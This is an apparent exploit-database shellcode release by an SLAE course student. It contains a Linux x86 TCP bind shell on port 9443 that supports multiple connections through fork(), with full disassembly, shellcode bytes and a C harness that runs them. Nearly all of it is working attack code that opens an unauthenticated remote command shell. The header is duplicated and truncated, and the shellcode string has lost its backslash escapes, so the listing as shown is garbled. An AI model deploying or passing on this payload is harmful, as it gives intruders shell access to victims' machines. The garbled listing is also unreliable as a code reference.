Linux x86 TCP 9443 Bindshell Shellcode

*
Title: Linux x86 TCP Bind Shell + fork() - 113 bytes (NULL Free)
Author: Amine Kanane <aminekanane_93@hotmail.com>
Student-ID: SLAE - 1203
Desc: List *
Title: Linux x86 TCP Bind Shell + fork() - 113 bytes (NULL Free)
Author: Amine Kanane <aminekanane_93@hotmail.com>
Student-ID: SLAE - 1203
Desc: Listen for a connection on Local Port 9443 and spawn a command shell
This version support multiple simultaneous connections using fork().
Also this shellcode does not use the classic socketcall() syscall.
Tested on: Linux/x86 - SMP Debian 4.9.30-1kali1
Date: 7 May 2018
Disassembly of section .text:
08048060 <_start>:
8048060: 31 c0 xor eax,eax
8048062: 31 db xor ebx,ebx
8048064: 31 c9 xor ecx,ecx
8048066: 31 d2 xor edx,edx
8048068: 66 b8 67 01 mov ax,0x167
804806c: b3 02 mov bl,0x2
804806e: b1 01 mov cl,0x1
8048070: cd 80 int 0x80
8048072: 89 c3 mov ebx,eax
8048074: 66 b8 69 01 mov ax,0x169
8048078: 52 push edx
8048079: 66 68 24 e3 pushw 0xe324 ; <== This is where we set the port number, please note that you need to adapt the number using htons() before :)
804807d: 66 6a 02 pushw 0x2
8048080: 89 e1 mov ecx,esp
8048082: b2 10 mov dl,0x10
8048084: cd 80 int 0x80
8048086: 66 b8 6b 01 mov ax,0x16b
804808a: 31 c9 xor ecx,ecx
804808c: cd 80 int 0x80
0804808e <infinite>:
804808e: 31 d2 xor edx,edx
8048090: 31 f6 xor esi,esi
8048092: 66 b8 6c 01 mov ax,0x16c
8048096: cd 80 int 0x80
8048098: 89 c6 mov esi,eax
804809a: 31 c0 xor eax,eax
804809c: b0 02 mov al,0x2
804809e: cd 80 int 0x80
80480a0: 31 ff xor edi,edi
80480a2: 39 f8 cmp eax,edi
80480a4: 75 e8 jne 804808e <infinite>
80480a6: 31 c0 xor eax,eax
80480a8: b0 06 mov al,0x6
80480aa: cd 80 int 0x80
80480ac: 89 f3 mov ebx,esi
80480ae: b1 02 mov cl,0x2
080480b0 <loop_dup>:
80480b0: b0 3f mov al,0x3f
80480b2: cd 80 int 0x80
80480b4: fe c9 dec cl
80480b6: 79 f8 jns 80480b0 <loop_dup>
80480b8: 31 c0 xor eax,eax
80480ba: 50 push eax
80480bb: 89 e2 mov edx,esp
80480bd: 68 2f 2f 73 68 push 0x68732f2f
80480c2: 68 2f 62 69 6e push 0x6e69622f
80480c7: 89 e3 mov ebx,esp
80480c9: 50 push eax
80480ca: 53 push ebx
80480cb: 89 e1 mov ecx,esp
80480cd: b0 0b mov al,0xb
80480cf: cd 80 int 0x80
*/

#include<stdio.h>
#include<string.h>

unsigned char code[] = "x31xc0x31xdbx31xc9x31xd2x66xb8"
"x67x01xb3x02xb1x01xcdx80x89xc3"
"x66xb8x69x01x52x66x68"
"x24xe3" // ==> port number = 9443; sock_ad.sin_port = htons(9443);
"x66x6ax02x89xe1xb2x10xcdx80x66"
"xb8x6bx01x31xc9xcdx80x31xd2x31"
"xf6x66xb8x6cx01xcdx80x89xc6x31"
"xc0xb0x02xcdx80x31xffx39xf8x75"
"xe8x31xc0xb0x06xcdx80x89xf3xb1"
"x02xb0x3fxcdx80xfexc9x79xf8x31"
"xc0x50x89xe2x68x2fx2fx73x68x68"
"x2fx62x69x6ex89xe3x50x53x89xe1"
"xb0x0bxcdx80";
main()
{
printf("Shellcode Length: %d ", strlen(code));

int (*ret)() = (int(*)())code;
ret();
}